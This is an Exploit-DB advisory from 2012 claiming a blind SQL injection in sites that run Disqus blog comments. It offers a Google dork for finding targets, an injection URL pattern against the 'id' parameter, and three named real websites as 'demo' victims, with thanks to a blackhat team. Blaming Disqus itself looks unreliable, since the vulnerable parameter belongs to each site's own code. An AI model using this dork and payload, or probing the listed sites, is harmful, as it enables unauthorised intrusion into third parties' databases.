Disqus Blog Comments Blind SQL Injection Vulnerability

2012-08-29T00:00:00
ID EDB-ID:20913
Type exploitdb
Reporter Spy_w4r3
Modified 2012-08-29T00:00:00

Description

Disqus Blog Comments Blind SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            :----------------------------------------------------------------------------------------------------------------------------------------:
Blog Comments Powered By Disqus <- Sql Injection
:----------------------------------------------------------------------------------------------------------------------------------------:

:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title: Blog Comments Powered By Disqus
: # Date: 28 August 2012
: # Author: Spy_w4r3
: # # Vendor or Software Link: http://disqus.com
: # Category : Web Applications
: # Google dork: inurl:/index.php?id= intext:"Powered by Disqus"
: # Vulnerability : SQL Injection Vulnerability
: # Tested On : Mozilla Firefox 14.0.1 (Windows)
: # Greetz to : Indonesian BlackHat Team, dr.spyc0d3r, syafm0vic007, budi_spielberg, zee.eichel, Xsan Lahci, ono_efeyu, wahyu_ade10, And Thia
:----------------------------------------------------------------------------------------------------------------------------------------:

# DORKS
:----------------------------------------------------------------------------------------------------------------------------------------:
inurl:/index.php?id= intext:"Powered by Disqus"

# Proof of Concept
:----------------------------------------------------------------------------------------------------------------------------------------:
SQL Injection : http://victim site/<path>/index.php?id=['SQL]

# Demo site: 
:----------------------------------------------------------------------------------------------------------------------------------------:
http://fourtales.com/index.php?id=116'
http://blasternation.com/index.php?id=131'
http://www.gogetaroomie.com/index.php?id=298'

# Credits 
:----------------------------------------------------------------------------------------------------------------------------------------:
http://indonesianblackhat.web.id | http://indonesianblackhat.web.id